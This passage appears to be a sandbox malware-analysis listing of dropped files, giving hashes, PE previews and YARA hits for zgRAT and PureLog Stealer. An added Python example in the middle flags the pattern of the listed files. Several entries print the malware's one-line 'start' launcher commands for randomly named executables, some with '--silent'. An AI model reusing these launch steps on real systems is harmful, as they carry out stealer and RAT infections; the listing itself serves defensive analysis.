                                                                                                                                                                                                                                SHA-256:FCE9BAF4FD60B3DA0EBA4545228EE53B9C030D21635EAFC135CCFC24DD946D4E
                                                                                                                                                                                                                                SHA-512:48E26F55E44DA6890A65CFFA23E4B949883C594392EFC1C00F04472587933CEA7C8E2AB65AF8D5993024A3F214B6B1A3CA0D8672612EB73C89EF44412A2693E6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
Size (bytes):69
Entropy (8bit):4.933255124462213
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5WHx+fc9DuELVF:fE1sZ23WR+fwDLJF
MD5:EB20713AD4FB538B03D6FC68AA62D7F3
SHA1:8FF2CE957CE9E6435B613C1E1A9920B490A56E8C
SHA-256:C4942A11FD8D4E09E19834AF447BCF72B42EA42A9A82D4695082EA94923FD025
SHA-512:4696DDC9B8CA99066C37AF71E227BF14D469725AEF3B0CE9CBFE39BAED491E7B05B47CE044EABB9BB9F317B95B07DAED7B8AB9EABEB381E12444F9F73C20DFC1
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\3byEz2syG9SedsHKOY8fjUva.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.907164268523369
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5zR3Xpt+DdAl:fE1sZ2393H+Bm
MD5:C1A0868B395F1EF5047D178412566ADE
SHA1:399C7611ED852E7191EB1840B0C742C036637E65
SHA-256:EC0B439BC9B4B9F12BE3D9E595472C3084A3D9EC556DDB3BDE73233900ED73E1
SHA-512:36F446BBA23812004FF44E6F75B9F488BE2FB4F8A4970ECCECAA33EED983758D69C9A7DF369BBBFF9D80ABF47CB8A657CB3CFEEB6C358785F0C2E871128BCE6D
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\V4R2L1ofXzAhB4UFI0Rj2LED.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.958030572933903
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5nOF2mJFn:fE1sZ232L
MD5:FE5D7A2FB46B5B834867082BA13553F6
SHA1:97E4B4455BF9D7989473832145F58A550E068F8E
SHA-256:C693E66C83CC5948294854758CEE9FAD0F50007082B15633C619C4F1B22B00DE
SHA-512:F36012C4A8D1384051F0FA9736EDF3B12C5FD26F103AE28ABC718BF03FDCB8743309E9E683FF93D05D0BFA496A19E626CF22FC2A9E3CFD116486C3D9CBD02038
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\BCSbmKJiX30BH99M4SeS6WhT.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.74984900805564
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5S3GAXam8jkdAl:fE1sZ23S2A9tdm
MD5:B1B6998AA54992B34E7D56086EEE0ADD
SHA1:0BECD4E7A5270A79BBB93B229D894A365DC7E820
SHA-256:43FDD9EA844340D18A89F05DC84117998D73771150AD0C5A6361B2690C4B5817
SHA-512:239AD0798A54C5902DB06F0AF114B0AFB6061477C78BCA8833AD39A6255944CC3A0D90226C416187B22CC19A4B1EBE2E93027A0CA16B5228F8EACE365D3EA1F0
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\wW4vGceNlpE9ACIAc69a33Yc.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.965135283016122
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5fRRWxkVuPneDAdm:fE1sZ235RWx6uGAs
MD5:203BF143CE43CDEA51A5CDACDB1E2241
SHA1:4C00E1C15E38F9181B841C8BE99A0503F15B1665
SHA-256:10FEDD57ED4599DA285D8FB059CBE54322EA7E3EB5D926D7AC305CFC49507B77
SHA-512:99E811294660883CBFD30161B264FAB805900A6D93FCCEEEC723D6BAF898B1950D8BE17AE3F964DF3A28115A38B18741C5AC8EADF59630247EC9935D07419385
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\z443T0kZxO5VAxRMw1cjpQdZ.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.9107787922352575
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5ExSd7Yi0kiykdan:fE1sZ23Es7fiyD
MD5:86560037A2C29EE6F1A5270019BC0DAB
SHA1:622F0E33F6BDF4263AC2324CD1BF504A2715AC11
SHA-256:82BEE5388BB95AF3E5F07EE24B31F8BA329A1702472056B2E7A45C8A9A03C9D2
SHA-512:681AE4BE6698231FDC5605F1A63A41B96AB4D7212825078F8A704E5722BAD6D168AF185D6F9DE548BBF39609F2FB60D68193D72AE5F31CB38CC42A04F9548836
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\aTFJoaTi8xkup68H3WyrFIbQ.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.8580798924666615
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5tcdjwKCtZLLv:fE1sZ23L5J
MD5:480A3F6AAE4D1E6A356F79D64B9E6510
SHA1:55C8C37DA34CAB2AFC04B3D8ED460DC02138C342
SHA-256:40BB570B20A20F101BDED6022EF3831F1DBBEDB79745D76726CF38389C67193E
SHA-512:D56C0C11E2BF1F1E9A0422A3A7043D3B922C66F4CF699FC1A60F9FA5F406611A642027BCCA0A1E1DADB4BE1859F8BBD20B493BCD1117A2DEEEEACB0CDBA297DD
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.764999465412405
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5cvd2NUWRy0Cl:fE1sZ23cVqUWy0Cl
MD5:142712B940F9E2940DA23E2FA20A6A6E
SHA1:59EC8FF2FAF8B4B7C00CC240BA0694D7A5B9FFC7
SHA-256:FB2BBEF4245D5502DC1E3AA935B910511B0D2BCA8F1BEF5DB9F433A5F46F51E9
SHA-512:2F9CAC9025089A8AA1DC5C7CC8804682CD946194AEC8479382FD19A2D07788C96BF63920051027290DAFCCD8422A51A52C6402E79A3B3233ADCB494D0886DA1C
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.882014449776854
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5WfdziAcmsJl:fE1sZ23W1z58Jl
MD5:9C01787D515879328F85EA00662A9B8B
SHA1:4B5F365B56A7716385380AC3E8C8A775E5C6E4A0
SHA-256:9B02B30EF27370A05266C1EACECCAA71920A5C08D701E81322FA47C57988A27A
SHA-512:3254774F71EC737F40FC0B53EFB7572D8E3516C4E7E7E4BE437289479F0E72B3559A976377C074EAA4F3D94150E58A820C3C1AE741EF2737E43A5F87EE553D73
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\3G30xcq8tfWItduGYVyT9CxK.exe"
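Every dropped file in this run of the listing is the same artefact: a one-line `start "" "<path>" [args]` launcher, written by the injected .NET host AddInProcess32.exe, that points at a 24-character random-named executable sitting directly under %LOCALAPPDATA% (one of them with `--silent --allusers=0` appended). That shape is what an analyst wants to triage automatically. The Python below is an added example, not code from the Joe Sandbox report: it parses records in this listing's flattened Key:Value layout, pulls the launched executable and arguments out of the Preview, and flags the pattern. The first sample record is copied from the report; the second is a constructed benign control (the ExampleVendor paths do not appear on this page). The `looks_random` heuristic and the `DOTNET_HOSTS` set are assumptions. `shannon_entropy` is the bits-per-byte metric that the 'Entropy (8bit)' column reports; computed over the visible Preview text it lands near the column's value but not on it, because the listed sizes (69 and 90 bytes) are slightly longer than the command text shown.

```python
import math
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input in the flattened Key:Value layout of the listing above.
# Record 1 is copied from the report; record 2 is a constructed benign control
# (hypothetical ExampleVendor paths) that does NOT appear in the report.
SAMPLE_RECORDS = '''\
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe
Size (bytes):69
Entropy (8bit):4.907164268523369
Malicious:true
Preview:start "" "C:\\Users\\user\\AppData\\Local\\V4R2L1ofXzAhB4UFI0Rj2LED.exe"
Process:C:\\Program Files\\ExampleVendor\\setup.exe
Size (bytes):47
Entropy (8bit):4.5
Malicious:false
Preview:start "" "C:\\Program Files\\ExampleVendor\\app.exe" --update
'''

# One-line launcher:  start "" "<path>" [args]
START_RE = re.compile(r'^\s*start\s+""\s+"(?P<path>[^"]+)"(?P<args>.*)$', re.IGNORECASE)
# Executable directly in %LOCALAPPDATA% (no subdirectory), as in every Preview above.
LOCAL_ROOT_RE = re.compile(r'^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\(?P<name>[^\\]+)$', re.IGNORECASE)
# Assumption: .NET helper hosts that should not normally be writing launcher scripts.
DOTNET_HOSTS = {"addinprocess32.exe", "addinprocess.exe"}


def parse_records(text: str) -> List[Dict[str, str]]:
    """One dict per dropped file; a record starts at each 'Process:' line."""
    records: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)   # values (paths, commands) contain ':' too
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0..8), the metric behind 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_random(stem: str) -> bool:
    """Heuristic (assumption): long all-alphanumeric stem mixing cases and digits."""
    return (len(stem) >= 16 and stem.isalnum()
            and any(c.isupper() for c in stem)
            and any(c.islower() for c in stem)
            and any(c.isdigit() for c in stem))


@dataclass
class Verdict:
    launched: str             # executable named in the start command
    args: str                 # trailing arguments, e.g. "--silent --allusers=0"
    dotnet_host_writer: bool  # script written by a process in DOTNET_HOSTS
    localappdata_root: bool   # target sits directly under %LOCALAPPDATA%
    random_name: bool         # target name passes looks_random()
    preview_entropy: float    # entropy of the Preview text, to compare with the column

    @property
    def suspicious(self) -> bool:
        return self.localappdata_root and self.random_name


def assess(record: Dict[str, str]) -> Optional[Verdict]:
    """Verdict for a record whose Preview is a one-line launcher, else None."""
    preview = record.get("Preview", "")
    m = START_RE.match(preview)
    if m is None:
        return None
    path, args = m.group("path"), m.group("args").strip()
    root = LOCAL_ROOT_RE.match(path)
    name = root.group("name") if root else path.rsplit("\\", 1)[-1]
    stem = name[:-4] if name.lower().endswith(".exe") else name
    writer = record.get("Process", "").rsplit("\\", 1)[-1].lower()
    return Verdict(launched=path, args=args,
                   dotnet_host_writer=writer in DOTNET_HOSTS,
                   localappdata_root=root is not None,
                   random_name=looks_random(stem),
                   preview_entropy=shannon_entropy(preview.encode("utf-8")))


def assess_listing(text: str) -> List[Verdict]:
    """Parse a listing and assess every launcher-style dropped file in it."""
    return [v for v in (assess(r) for r in parse_records(text)) if v is not None]


if __name__ == "__main__":
    for v in assess_listing(SAMPLE_RECORDS):
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"{flag:10} dotnet_host={v.dotnet_host_writer} "
              f"entropy={v.preview_entropy:.2f} {v.launched} {v.args}")
```

The verdict deliberately keeps the writer-process check separate from the path check: a launcher written by AddInProcess32.exe is worth a look even when it targets a normal path, and a random-named binary in the %LOCALAPPDATA% root is worth a look whoever wrote the script. The entropy figures for these files (all between 4.7 and 5.0) are what short ASCII command lines look like; the same function run over a packed PE would come out close to 8, which is why the column is useful for spotting encrypted or packed drops in the rest of the listing.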

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.861352336505184
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5XOIzWjupGfFlIkdan:fE1sZ23pzWjuodSD
MD5:64895C9465C538741D9246392494B5F2
SHA1:A526D0B815CB358E1FCC93B1F14BB5EF251A2836
SHA-256:2A64213751014F382926C43C5E2A54629D36CC84888C09C9B7EA8DBB1341FFC3
SHA-512:CE5FE8067819BD78E95B60161B0DD25D026BF3582FD1D70280FD39B4139904E38A11494BE71B890C279B7D41A191DAD7698DC0132C70C1786D4BA9F40986E65E
Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ra8RK0HZwqsQsFKuKAOljczn.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                Entropy (8bit):3.3454618442383204
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:FkWXlNLbO07:91bOw
                                                                                                                                                                                                                                MD5:0446077FC9A25ED02FBBD68539B38270
                                                                                                                                                                                                                                SHA1:C370C1EBCE3A461403826E0F3E24243240558CD6
                                                                                                                                                                                                                                SHA-256:F072ACBB8972180D0E47697A75DF16B4C4073448D8D6382961FF35FAB32D6372
                                                                                                                                                                                                                                SHA-512:FAF71834BDB3654B20F1D032471D919688FFB9005F7AB7568E05F2E7BE876360B30821960063DF5C641D8E982F4621F5B556C32C9A3D8DFB0A9B29F51F366DC3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:sdPC....................)aM..4mD.....Y..
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6700529
                                                                                                                                                                                                                                Entropy (8bit):7.996136280137261
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:91Ofp2zjJY231tFaCYTlZE1JLFSNGw6eJm5JeHxFKw7/X26jOnCB9XmtPtX4S8Bl:91Oh2zjVpYD8vDwJmaHxbS2Os9qP0eEn
                                                                                                                                                                                                                                MD5:48083F28A764D552C591874EC8255897
                                                                                                                                                                                                                                SHA1:6A6F73D45AA90F751C47BA886DDA6C0F8C7A440A
                                                                                                                                                                                                                                SHA-256:65122561EF77967E63D5F3F5CBE450FF891B3FB47A206E305E838C3B491F7585
                                                                                                                                                                                                                                SHA-512:F62312F2ED7DB1F98C04985135C75D46D86482F2A1C7E457CBE003B35C5D20065EB960FE9A7A0D535380C6CF4CEF48AC0F4FBD46B449C4A470EE6E8BA88559AB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405112
                                                                                                                                                                                                                                Entropy (8bit):7.969340645756812
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:bjy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFua:LpjD+c6O+8yZ9
                                                                                                                                                                                                                                MD5:093FD75971D1A764AB617DDFF40660B3
                                                                                                                                                                                                                                SHA1:78FDA0ED65D5A7D8E427D63328EBFEA74029368A
                                                                                                                                                                                                                                SHA-256:3651CA232A293D6C0670F30467B5A65D0550E64DF2305ADA9C006B50CCCC6F81
                                                                                                                                                                                                                                SHA-512:E3FCF30E34D9236C6EAC5A6A18DE375A0AF63B1E522C548F735F2CF064CBCCE93DF693E996C7FCE3661291D466EBD5E72392B6FE83601F33852C4940B232F746
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.x...............8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:HTML document, Non-ISO extended-ASCII text, with very long lines (17990)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):285182
                                                                                                                                                                                                                                Entropy (8bit):5.13902130764208
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:YMttFywtNnTbN/axRkbGqwyCqszjlNW6fOTHg0mRU0ebgKnIY6/u1:fnF/axR0CqmjlfN0gKnIY6u1
                                                                                                                                                                                                                                MD5:283DCC3A831721109105E1A20699DC2D
                                                                                                                                                                                                                                SHA1:66FAC619246C4CB700EA9E7C897EC629971C3F4A
                                                                                                                                                                                                                                SHA-256:95184D432D08BA0AA5271AA01DAA10DEFDBDECF2294D2CAB0ADA8C3CFFE909ED
                                                                                                                                                                                                                                SHA-512:76DBBA5922F9FD2E83341D7069853E2A9D8CDF007FD61E4F48F76713B72C0792D8A7064A798A4EC41455ED7112A6A88C624381ECF486F94529CA8AC75F856FC6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error | VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const n=new XMLHttpRequest;n.open("GET","/badbrowser_stat.php?act=nomodule"),n.send(),e&&window.location.replace
Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5077008
Entropy (8bit):6.713226173072206
Encrypted:false
SSDEEP:98304:AZ5VfUpCCTIDsAi8LXS2vwJ1EbfdOq5elO:Axf8ivmOfdOq5elO
MD5:D15459E9B9D12244A57809BC383B2757
SHA1:4B41E6B5AA4F88FDF455030DB94197D465DE993A
SHA-256:37AEF611EC814AF2CDCFA198E200CB21ECB46CAA30F84D0221A47DB1265B889D
SHA-512:40558644CA9918B84A9438A3A2C4D85A97DDEC378AED23756E14C57351D4B4C82D6316ADD1E62243826328E42C766784CEE5D6CAE41C6FA6C43864F5097A239C
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........rs... ... ... ...!... ...!t.. ...!... z". ... z".!.. z".!... z".!... ...!... ... ^.. K!.!... K!. ... ... ... K!.!... Rich... ................PE..L......f...............'.....:........:...........@...........................\.....E.N...@..................................@$......@..._....................\..............................P$..................................................... .........l.................. ..` ~............p..............@..@ ............r..............@....rsrc...._...@...`..................@..@ ......#..R..................@..B.idata.......@$......4..............@....tls.........P$......6...................themida.@8..`$..@8..8..............`....reloc........\......xM................@........................................................................................................................

Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3713824
Entropy (8bit):7.975282960011526
Encrypted:false
SSDEEP:98304:Ybp/anKeCturToS0c8u0whmllNBPIoHPbBm0o+:Y7eCOgc8u3hKLiS
MD5:4155331E3491440A65ABC55C925C554F
SHA1:2BF38138FC9140D6708AC0AEBBCDD509409E798B
SHA-256:30C951A5881A9A9E50DCD5C78B69E518BBA55FA16245AD0D422BEF6F20CA2480
SHA-512:83C384E2F10D52A934F92498FE2D445053EAC000079C81F99060D34B4A23152D6BC9EEA4464700F38937B48D37A64720939DEBF1098F48F3482156ED96DD8F2F
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.%f...............'............*.D...........@..........................Pq......Q9...@...................................o.@....@q.".............8. .... q............................. .f.....`.q.@.............8.......d.@....................text............................... ..`.rdata..Z{..........................@..@.data...0I... ......................@....vmp,,,0[( ..p...................... ..`.vmp,,,1,.....8.....................@....vmp,,,2.d8...8..f8................. ..`.reloc....... q......r8.............@..@.rsrc..."....@q.......8.............@..@................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):325120
Entropy (8bit):6.52662580847976
Encrypted:false
SSDEEP:3072:OU7+A0a8Ga/QpfLEnbp+sQAZXX6Gr+GM1ny3JRQPEM0YPVH0HZ+i01OYKbO5X0CO:QQa/QpGrtO2APEVYPw+3OYc5KqbI
MD5:0BAE95163FC9DD6EED4854D33084096F
SHA1:985F5CF9D15FC9B859D8C2F7A9607B0824A80B4F
SHA-256:65A7B796D7C0DB8377C48FB5388FA149A10C17B5E511C3B5392EF55E0656A220
SHA-512:AFE5BFA20DEB38BFEB4A30ECDEF9C71CB8402DA9EF14BAC653C9828F9452E851FD1BEFAA49D4096B7443A3C982C7E6593AEA5256D93820C1116B098186766458
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......d............................O?............@..........................0..................................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4405112
Entropy (8bit):7.969342371736577
Encrypted:false
SSDEEP:98304:bjy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFu9:LpjD+c6O+8yZC
MD5:2DCF36A97DEF98F6620110EE495CA26F
SHA1:2DB46017FCDD7B616C3563BA475B6CDE88339945
SHA-256:B625FA02003D1F41E85DB1243E7E12357A3A1622CBD22BE35B11702A5AD0EAB5
SHA-512:E4CFB972D69A9392F9F161F0BA1BB4F8FBBA6DB9FF49A69D68E17F6940996C4D041F52CF71C54C01A15BB3FE1CBAA165961B8C01585F005153FFF4AF5AE8A0C3
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.x...............8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4069200
Entropy (8bit):7.532534042648446
Encrypted:false
SSDEEP:49152:MIF8M31NQDgRmeebiQ07intlAEE3sQIcvw4AAVbmVeXQE4aZ+G9/FBiyu7vBHvpT:5lPY/HrAEE3sxfpAV/XQExHULR9RL4Qx
MD5:3C244FAE9CB5BB37D4410F4C9D6FE90A
SHA1:3E03A9E42B537B793770C4205DB7F4BAC7EC6561
SHA-256:AF60EEC4FCC826168F9BB7F849BC24B9C67BC9367126C20B8A80D6B0E1C416C1
SHA-512:9408A67B96AC32F8C767B5A8FEBE6C89A1C75EE8666DE237E806AC4F61A0895BC468BE70D4F19B4DA26823226052CBB7D9E0A654311772DB630D0AFE4BD26DE7
Malicious:true
Yara Hits:
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, Author: Joe Security
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, Author: Joe Security
• Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, Author: ditekSHen
Reputation:unknown
